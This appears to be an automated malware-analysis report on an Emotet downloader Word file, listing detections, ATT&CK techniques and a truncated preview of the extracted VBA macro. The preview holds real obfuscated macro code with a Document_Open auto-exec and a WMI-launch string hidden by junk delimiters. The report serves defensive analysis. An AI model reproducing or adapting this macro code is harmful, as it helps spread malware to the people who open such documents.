MALICIOUS
202
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is identified as malicious by ClamAV with a specific Emotet signature. Heuristics indicate the presence of VBA macros, specifically a Document_Open macro that utilizes GetObject, suggesting an attempt to execute malicious code. The VBA code itself is heavily obfuscated with meaningless variable names and loops, but the presence of the Document_open auto-execution and the GetObject call are strong indicators of malicious intent, likely to download and execute a secondary payload.
Heuristics 6
-
ClamAV: Doc.Downloader.Emotet-7473714-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Emotet-7473714-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
GetObject call high OLE_VBA_GETOBJGetObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 7575 bytes |
SHA-256: 08c944f3b4cd9e1d22d5483e817d198340b20aa35870bbb767208a62059a47fd |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Vxxjpuroivnlu"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "Gytiudbjvyj, 0, 0, MSForms, TextBox"
Private Sub Document_open()
Dsxkvdqwvbxbw = 234 + 423
Do While Ietrcxlummv = 1
Dyahtlnx = 3 * Zytfqziujrm
Dggzsykx = ("Fred")
For Qtwbqilh = Pusirvvesl To Nywbnluyosy
Ltxrmyjv = ("Omnis.")
Jnyhwdgeps = 223
Next
Yepuzmrvw = Egbxmgmasgmnn
Loop
Ovmdxabvzp
Jppvdpsfkq = 234 + 423
Do While Atehjxzdj = 1
Tfzrxydfo = 3 * Fsvxasiu
Xbwmxqhboxa = ("Qui rerum aliquid.")
For Vpexvhglw = Nmmmwgvpctwec To Hweapczlzhwun
Cahzyldueicl = ("Ratione libero tenetur assumenda doloremque dicta est harum.")
Ylbsvzkhwdu = 223
Next
Nfzlhciq = Dgoebzsmrvyaw
Loop
End Sub
Attribute VB_Name = "Xwtsaryn"
Attribute VB_Base = "0{41A8A298-BA38-488F-9A2F-CA3C8BE5D474}{8E2F5AD2-4690-4C7A-BC26-6CDED876C27F}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "Uabiwvktv"
Function Xpdnzdpoiosa()
Hxmiztra = 234 + 423
Do While Hsewzhte = 1
Ujgujlod = 3 * Lxbhlcarnja
Dttcyxtqrfl = ("Asperiores ut aut aut.")
For Qsyoeozyqjrwl = Cqkdlsdbp To Giztsqxnmis
Mjrmjcfna = ("Nostrum earum fuga dolor.")
Auhxfnqjfoh = 223
Next
Wrbyxkykrfrcb = Ndcgwltxiaiz
Loop
Kinetedfx = Vxxjpuroivnlu.Gytiudbjvyj
Klgskatlinoel = 234 + 423
Do While Fnaepnkcgy = 1
Tjfvdofslxu = 3 * Onxtmhosz
Yeokzjztak = ("Amet.")
For Crlpfrah = Xaanjtrvxu To Wyzuscxaoxplu
Ribziqnh = ("Voluptas.")
Lagcfnfigv = 223
Next
Lyxjswzloth = Mvvlfjqljgcry
Loop
Ptjywpbprdtd = Kinetedfx + Xwtsaryn.Otgopzttwwsxm + Xwtsaryn.Xhaofdoue + Xwtsaryn.Huzdaljzgutn
Mpxxwbgr = 234 + 423
Do While Bsfoibqpfea = 1
Rmsjvsddajjt = 3 * Fwadvkvdl
Bsbxqict = ("Ut unde minima.")
For Leskzdjai = Svktfafhyoax To Abgjahzuaush
Hmcdzgjxrelhw = ("Corrupti deserunt sed et.")
Rkglqybdqhovx = 223
Next
Axiizmmwxzk = Cysknwjjlv
Loop
Hbjhcyhq = Ptjywpbprdtd + Xwtsaryn.Yumsgllsxk + Xwtsaryn.Ycqbeaauqeyp.Tag
Gknrkjewgug = 234 + 423
Do While Iolaztiezig = 1
Ghfnkyvvlka = 3 * Tnlyspksnt
Woykhbhev = ("Tempore.")
For Qtjiqsxdkgqav = Qqcwtnog To Xkditonrpu
Guzqqfzgn = ("Eaque sed quis et.")
Glqczjkbmvyt = 223
Next
Urscjfxvhjhw = Jgiwtswxclohf
Loop
Xpdnzdpoiosa = Xhhtcaavbd + Hbjhcyhq + Xhhtcaavbd
Kxgijdrldsqcz = 234 + 423
Do While Putfchevy = 1
Yiclpbmbhcg = 3 * Yknugkmdqltnm
Sgcisvejjrdoq = ("Alfred")
For Cicvhstkpndki = Ydsqjbzyzc To Ecdvwfqj
Qbdyvnuokv = ("Occaecati ipsam beatae inventore.")
Tawzoxcj = 223
Next
Nrphmshfsnxn = Mkfmdlrynejd
Loop
End Function
Function Ovmdxabvzp()
Mcbdenpu = 234 + 423
Do While Utxbcznbou = 1
Czurhxruwbq = 3 * Jzpqcfetpxxlu
Gemewvabi = ("Brendan")
For Rdumsdeet = Kmoaxmcwfmkmo To Lxbjxgdwoay
Uhqtehtaq = ("Recusandae dolorum non modi ullam quos ea iusto.")
Nzmhthrgudrgc = 223
Next
Shqzayjx = Wrhhyovbdvytw
Loop
iwiwiiwiwjjsj = "__&888*&^bBGks^@"
Kmrzuwhpy = 234 + 423
Do While Rnplsbun = 1
Jghbmqsx = 3 * Ivlbzpvuxrbd
Nemttltuxgafk = ("Quis et.")
For Goryqtvco = Fappzgrl To Dydpyoyfa
Xlrckfycr = ("Terrence")
Hqfsfhguozkad = 223
Next
Irfxwnryhoy = Asiwefqnjfi
Loop
Rpiaolvlcxto = Split("__&888*&^bBGks^@wi__&888*&^bBGks^@nmg__&888*&^b" + "BGks^@mts__&888*&^bBGks^@:Wi__&888*&^bB" + "Gks^@n3__&888*&^bBGks^@2___&888*&^bBGks^@" + Vxxjpuroivn
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.